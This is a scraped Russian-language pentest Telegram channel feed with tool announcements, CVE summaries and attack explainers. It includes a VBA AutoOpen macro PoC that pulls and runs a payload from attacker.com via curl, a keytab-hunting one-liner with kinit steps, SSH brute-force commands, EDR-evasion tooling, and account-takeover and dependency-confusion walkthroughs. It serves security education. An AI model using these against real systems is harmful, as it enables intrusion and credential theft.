Похек
16.6K subscribers
2.11K photos
110 videos
243 files
3.08K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
FlareSolverr

FlareSolverr запускает прокси-сервер и ожидает запросов пользователя. Когда приходит какой-то запрос, он использует Selenium с undetected-chromedriver, чтобы создать веб-браузер (Chrome). Он открывает URL с параметрами пользователя и ждет, пока не будет решена проверка Cloudflare (или истечет время ожидания). HTML-код и куки отправляются обратно пользователю, и эти куки могут использоваться для обхода Cloudflare с помощью других HTTP-клиентов. Веб-браузеры потребляют много памяти. Если вы запускаете FlareSolverr на машине с небольшим объемом ОЗУ, не делайте много запросов одновременно. При каждом запросе запускается новый браузер. Также можно использовать постоянную сессию. Однако, если вы используете сессии, убедитесь, что закрываете их как можно скорее после окончания работы с ними.

Установка:
docker
run -d \
--name=flaresolverr \
-p 8191:8191 \
-e LOG_LEVEL=info \
--restart always \
ghcr.io/flaresolverr/flaresolverr:latest

Также вы можете установить из готового бинаря или с помощью питон, но рекомендованный способ - через Docker.

#tools
🔥2🤝2🆒1
14 добрых хакеров | Большое интервью со специалистами ИБ

Крутое и длительное интервью от коллег из SecLab. Всем советую посмотреть)

#интервью
🔥3❤‍🔥1
Acheron
Indirect Syscalls для обхода AV/EDR в Go Assembly

Acheron - это библиотека, вдохновленная SysWhisper3/FreshyCalls/RecycledGate, с большей частью функциональности, реализованной на Go assembly.
Пакет acheron может быть использован для добавления возможностей indirect syscall capabilities в ваш Golang tradecraft, для обхода AV/EDRs, которая использует usermode hooks и instrumentation callbacks для обнаружения аномальных syscalls, которые не возвращаются в ntdll.dll, когда вызов переходит обратно из kernel->userland.

Установка:
go install github.com/f1zm0/acheron@latest

#tools
🫡43
Forwarded from Zer0Day Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Я наконец закончил просмотр докладов с прошедшего PHD12 и, как обычно, делюсь тем, что мне понравилось:

* Внедрение кода в процессы из контекста ядра Linux [video]

* Антология способов программного мониторинга и защиты Linux в пользовательском пространстве [video]

* 0-day-эксплойты рансомварщиков для Windows [video]

* Социальная инженерия: тенденции red team, технические аспекты kill chain и проектный опыт [video]

* Red teaming: методики фишинговых атак [video]

* Port security bypass: подключаемся к сети через любую розетку [video]

* Геопространственная разведка на вашем рабочем столе [video]

P.S. если у кого есть презентации данных докладов, прошу в личку @hackerralf8

#redteam #pentest #initial #osint #exploit #malware #video
🔥4
Пентест — самая творческая ИБ-дисциплина, а у всех креативных профессий есть премия. Awillix создали Pentest Awards — первую в России премию исключительно для пентестеров.

→ 6 номинаций для разных частей имитации хакерских атак;
→ Топовые профессионалы в совете жюри;
→ Заявка — это обезличенный рассказ про лучший проект в свободной форме;
→ Награда — техника Apple для 1,2,3 места + билеты на Offzone, обучение в школе CyberED, много мерча и самое главное — респект всего комьюнити :)

Отправляйте заявки на сайте — https://award.awillix.ru/, время органиченно.
🤣5🔥4❤‍🔥3🫡3
Monitorizer

Очередной инструмент поиска поддоменов, вдохновленный subalert. Но у него есть интересная особенность. Он имеет интеграцию с nuclei, Acunetix, Slack.

Интеграция nuclei:
1. По умолчанию интеграцию уже включена, если вы хотите ё выключить, то отредактируйте файл config/default.yaml
2. Nuclei будет пересканировать все поддомены (не только найденные)

Интеграция Acunetix:
1. Вам нужно иметь запущенный Acunetix.
2. По умолчанию эта интеграция отключена, чтобы включить ее, необходимо написать @monitorizer acunetix enable в запущенный monitorizer.
3. На каждый новый найденный поддомен будет создаваться новый инстанс в Acunetix, который будет сканировать таргет.

Интеграция Slack:
report:
slack: # required
channel: CM8XXXXXX
token: BZBZBZBBZB-XXXXXXXXXX-ZZZZZZZZZZ-YYYYYYYYYYYYYY

acunetix: # optional
token: 63c19a6da79816b21429e5bb262daed863c19a6da79816b21429e5bb262daed8
host: acunetix.exmaple.com
port: 3443

settings:
nuclei:
enable: true
interval: 86400 # rescan all targets in the watch list every 24h
options: -impact high


Подготовка окружения:
sudo pip3 install -r requirements.txt

Запуск мониторинга:
python monitor.py -w watch_targets.txt

Monitorizer поддерживает более одного инструмента поиска субдоменов для поиска наибольшего количества целей:
scanners  = [
aiodnsbrute, # https://github.com/blark/aiodnsbrute (included)
subfinder, # https://github.com/subfinder/subfinder (included)
sublist3r, # https://github.com/aboul3la/Sublist3r (included)
dnsrecon, # https://github.com/darkoperator/dnsrecon (included)
dnscan, # https://github.com/rbsec/dnscan (included)
amass, # https://github.com/OWASP/Amass (included)
]


Также если вам нужно будет подключить API сторонних сервисов/инструментов сохраняйте их сюда: config/thirdparty/*

Запуск инстанса Monitorized:
screen -dmS monitorizer bash -c 'python3 monitor.py -w targets.txt'

#tools
4🔥2
reFlutter

Этот фреймворк помогает в reverse приложений Flutter, используя исправленную версию библиотеки Flutter, которая уже скомпилирована и готова к перепаковке приложений. В этой библиотеке изменен процесс десериализации снимков, что позволяет выполнять DAST в удобной форме.

Установка:
pip3 install reflutter

Автор написал очень удобный framework для реверcf Flutter приложений, поэтому использование инструмента фактически однокнопочное:
reflutter main.apk

Далее вам нужно настроить анализ трафика приложений в Burp Suite.
Также вам не нужно устанавливать ни сертификаты, ни root.
Также этот инструмент помогает обходить некоторые реализации flutter certificate pinning.

#tools
🐳3🔥2🆒2
​​WordPress BookIt <= 2.3.7 – Authentication Bypass
CVE-2023-2834

Плагин BookIt для WordPress уязвим для обхода аутентификации в версиях до 2.3.7 включительно. Это связано с недостаточной проверкой пользователя при бронировании встречи через плагин. Это позволяет злоумышленникам, не прошедшим проверку подлинности, войти в систему под именем любого существующего на сайте пользователя, например, администратора, если они знают его электронную почту.

Плагин BookIt предоставляет шорткод 'bookit' для встраивания календаря бронирования встреч в страницу на сайте WordPress. Используя эту функциональность, после выбора даты и времени в календаре можно забронировать встречу, указав имя, адрес электронной почты и пароль для регистрации.

Изучение исходного кода показывает, что плагин проверяет идентификатор пользователя на основе адреса электронной почты, указанного через параметр 'email'. Если email принадлежит существующему пользователю WordPress, он свяжет запрос с этим пользователем и установит для него аутентификационные cookies.

К сожалению, эта функциональность была реализована небезопасно, поскольку она не включает никаких проверок подлинности, таких как проверка пароля. Она просто ищет личность и разрешает это действие без надлежащей проверки и аутентификации.

Это дает возможность злоумышленникам обойти аутентификацию и получить доступ к произвольным учетным записям на сайтах с уязвимой версией плагина. Как всегда, это позволяет злоумышленникам полностью скомпрометировать уязвимый сайт WordPress и заразить атакуемый сервер.

#CVE
Forwarded from SHADOW:Group
🔐nOAUTH | Захват аккаунта через Microsoft OAuth

На сайтах, где идентификация идет по Email и есть возможность войти через Microsoft OAuth есть риск захвата аккаунта.

Дело в том, что Azure не проверяет установленную в аккаунте почту, что позволяет вам указать почту жертвы и войти на уязвимый сайт через OAUTH от ее имени.

- Жертва регается на сайте через свою почту.
- Заходим в Azure AD и меняем свою почту на почту жертвы.
- Заходим на сайт через Microsoft OAuth и получаем доступ к аккаунту жертвы.

Видео PoC

#web #ato #oauth
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from RedTeam brazzers (Миша)
Кража KeyTab.

Во время тестирования на проникновение часто встречаются системы Linux с настроенным Keytab. Keytab хранит пары принципала кербероса и его зашифрованных ключей. С помощью этих зашифрованных ключей можно получить TGT. В результате чего появляется возможность запросить TGT на имя принципала без ввода пароля. Kerberos на Linux уже далеко не редкость - гетерогенные сети становятся все более популярными по ряду причин. Например, может быть такой сценарий, что на Linux бекапится содержимое какой-либо шары, при этом получить доступ к этой шаре могут только пользователи домена. В таком случае пишется простенький скрипт на баш, в котором реализуется логика по запросу TGT тикета на основе KeyTab, а затем копирования файлов с шары. Причем для периодичности запуска скрипт добавляется в crontab.

Нам, как атакующим, конечно же, интересен процесс запроса TGT билета на основе KeyTab. Для этого можно использовать команду kinit со следующим синтаксисом:
kinit –kt <keytab> <принципал>

Например, если файл /tmp/admin.keytab служит для аутентификации пользователя admin@OFFICE.LOCAL , то делаем вот так:
kinit -kt /tmp/admin.keytab admin@OFFICE.LOCAL

Остается лишь одна проблема - обнаружение самих KeyTab файлов. Конечно, можно ручками через find искать эти файлы, потом также муторно проверять разрешения на них, что не есть хорошо. Поэтому я накалякал следующий командлет, который автоматически найдет все .keytab файлы , а затем подсветит интересные разными цветами:
1. Зеленым подсвечиваются те файлы, которые принадлежат текущему пользователю.
2. Желтым подсвечиваются те файлы, которые принадлежат пользователю, отличному от текущего, при этом текущий пользователь не имеет достаточных прав (чтение/запись) на этот самый KeyTab.
3. Наконец, красным подсвечиваются файлы, которые принадлежат пользователю, отличному от текущего, при этом текущий пользователь имеет достаточные права на этот самый KeyTab.

find / -iname '*.keytab' -type f -exec ls -l {} \; 2>/dev/null | awk -v user="$(whoami)" 'BEGIN { FS = OFS = " "; red = "\033[31m"; yellow = "\033[33m"; green = "\033[32m"; reset = "\033[0m" } { if ($3 == user && $9 ~ /.keytab$/) { printf green } else if ($3 != user && $9 ~ /.keytab$/ && $1 ~ /^-.w.r../) { printf red } else if ($3 != user && $9 ~ /.keytab$/ && ($1 !~ /^.w.r../ || $1 !~ /^-.w../)) { printf yellow } print $0; printf reset }'
👏41
Forwarded from Hack IT Easy
PEN-200-2023.pdf
49.2 MB
PEN-200-2023 💻

Наконец появилось то, что так долго ждали - обновленный курс OSCP. Мне новая методичка понравилась гораздо больше, чем предыдущая. Структурированный материал. Видна работа методологов.

Забираем и наслаждаемся.
🔥61🤝1
msLDAPDump

LDAP Enumeration Tool. msLDAPDump упрощает перечисление LDAP в домене, превращая библиотеку lpap3 из Python в простой в использовании интерфейс. Как и большинство инструментов, этот лучше всего работает под Windows. Если используется Unix, инструмент не будет определять имена хостов, которые в настоящее время недоступны через eth0.

#tools
2
Media is too big
VIEW IN TELEGRAM
Microsoft 365 MSO 2305 Build 16.0.16501.20074 Remote Code Execution
CVE-2023-28285

Сама атака осуществляется локально пользователем, имеющим аутентификацию на целевой системе. Злоумышленник может использовать уязвимость путем убеждения жертвы с помощью социальной инженерии загрузить и открыть специально созданный файл с веб-сайта, что может привести к локальной
атаку на компьютер жертвы. Злоумышленник может убедить жертву открыть вредоносную веб-страницу, используя вредоносный файл Word для Office-365 API. После того, как пользователь откроет файл, чтобы прочитать его, из API Office-365, не будучи спрошенным, что он хочет активировать, и т.д., он активирует код вредоносного сервера, который он внедрит сам, с этого вредоносного сервера. После этого клика, злоумышленник может получить конфиденциальную информацию!

PoC:
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s
http://attacker.com/CVE-2023-28285/PoC.debelui | debelui", vbNormalFocus)
End Sub

#CVE #RCE #POC #Microsoft
Cbrutekrag

Написанный на C инструмент для брутфорса SSH серверов с помощью словарей.

Сборка:
git clone --depth=1 https://github.com/matricali/cbrutekrag.git
cd cbrutekrag
make
make install

Использование:
cbrutekrag -T targets.txt -C combinations.txt -o result.log
cbrutekrag -s -t 8 -C combinations.txt -o result.log 192.168.1.0/24

#tools
7
Этим вечером хочу порекомендовать вам быстро развивающийся канал коллеги по цеху, который активно улучшает и создает контент для нашего с вами комьюнити. Многим из вас думаю понравиться его стиль и ход мыслей)

Присоединиться
🗿1
​​Firefly

Firefly - это продвинутый fuzzer, а не просто инструмент для bruteforce. Firefly дает преимущество тестирования цели с помощью большого количества встроенных тестов для обнаружения поведения цели. Firefly находится на первых стадия разработки, но работает корректно. Данный инструмент имеет огромное количество интересных преимуществ.

Установка:
go install -v github.com/Brum3ns/firefly/cmd/firefly@latest

Сборка:
git clone https://github.com/Brum3ns/firefly.git
cd firefly/
go build cmd/firefly/firefly.go
./firefly -h

Базовое использование:
firefly -h
firefly -u 'http://example.com/?query=FUZZ'

Продвинутое использование:
firefly -u 'http://example.com/?query=FUZZ' --timeout 7000
firefly -u 'http://example.com/?query=FUZZ' -m GET,POST,PUT -p https,http,ws
echo 'http://example.com/?query=FUZZ' | firefly

Поддержка GET запросов
firefly -r '
GET /?query=FUZZ HTTP/1.1
Host: example.com
User-Agent: FireFly'

Поддержка POST запросов
firefly -r '
POST /?A=1 HTTP/1.1
Host: example.com
User-Agent: Firefly
X-Host: FUZZ

B=2&C=3' -au replace

Верификация результата
firefly -u 'http://example.com/?query=FUZZ' -e

Сохранение результатов:
firefly -u 'http://example.com/?query=FUZZ' -o file.txt
firefly -u 'http://example.com/?query=FUZZ' -oJ file.json

У инструмента ещё много функций, которые мне не удалось уместить в статью, так что пользуйтесь на здоровье и читайте документацию)

#tools
4🔥4🎉2🆒1
​​🔵Firejail

Firejail - это программа-песочница SUID, которая снижает риск нарушения безопасности, ограничивая среду выполнения ненадежных приложений с использованием пространств имен Linux, seccomp-bpf и возможностей Linux. Она позволяет процессу и всем его потомкам иметь свой собственный частный вид общих ресурсов ядра, таких как сетевой стек, таблица процессов, таблица монтирования. Firejail может работать в среде SELinux или AppArmor и интегрирован с группами управления Linux.

Написанное на C с практически отсутствующими зависимостями программное обеспечение работает на любом компьютере Linux с версией ядра 3.x или новее. Оно может создавать песочницу для любого типа процессов: серверов, графических приложений и даже пользовательских сеансов входа в систему. Программное обеспечение включает профили песочницы для ряда более распространенных программ Linux, таких как Mozilla Firefox, Chromium, VLC, Transmission и т.д.

Песочница легкая, накладные расходы низкие. Нет сложных файлов конфигурации для редактирования, нет открытых соединений сокетов, нет демонов, работающих в фоновом режиме. Все функции безопасности реализованы непосредственно в ядре Linux и доступны на любом компьютере Linux.

Установка:
sudo add-apt-repository ppa:deki/firejail
sudo apt-get update
sudo apt-get install firejail firejail-profiles

Сборка:
git clone https://github.com/netblue30/firejail.git
cd firejail
./configure && make && sudo make install-strip

Запуск различных приложений:
firejail firefox            # запуск Mozilla Firefox
firejail transmission-gtk # запуск Transmission BitTorrent
firejail vlc # запуск VideoLAN Client
sudo firejail /etc/init.d/nginx start

#tools
🔥81
Атака на цепочку поставок Dependency Confusion

Привет! Году в 2019-2020 вышло исследование на тему данной атаки, она может применяется в вебе, тем самым можно получить RCE, данная атака принимается и в баг баунти
Автор этой атаки получил таким образом RCE в 35 компаний, давай разберемся в чем ее суть и как работает

🟢 Суть данной атаки в том, что нужно найти пакет, которого нет в публичном репозитории и создать пакет с точно таким же названием, сделать его вредоносным и версию выше чем прошлая и залить в публичный репозиторий, это затриггерит авто установщики и на сервер попадется твой вредоносный пакет

🟢 Пример: на сайте ты нашел файл package.json и увидел какие есть пакеты, осталось узнать какого пакета нет в публичном репозитории. После того как выявил пакет, надо создать вредоносный, с таким же названием но версией повыше, залить в публичный репозиторий и просто ждать отклик

🟠Более подробный пример эксплуатации можно глянуть тут: https://telegra.ph/RCE-cherez-Dependency-Confusion-05-11

📌 Из нюансов это атаки - отклик можно ждать от нескольких часов до недель(у кого-то даже месяцев), твой файл может подхватить разработчик компании(некоторые платформы бб это все равно принимают), твой файл может подхватить другая компания

ЧТНП | #web
Please open Telegram to view this post
VIEW IN TELEGRAM
53
🌚13🐳2🆒2
Forwarded from BI.ZONE Bug Bounty
🪲 Level up: «Тинькофф» выпускает обновление

Публичная программа «Тинькофф» на BI.ZONE Bug Bounty выходит на новый уровень.

В скоупе теперь open-source код некоторых разработок компании: OpenAPI, мобильные SDK, бэкенд-фреймворки и многое другое.

Смотрите полный список на сайте платформы — и вперед за баунти!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3❤‍🔥2👍2🌚1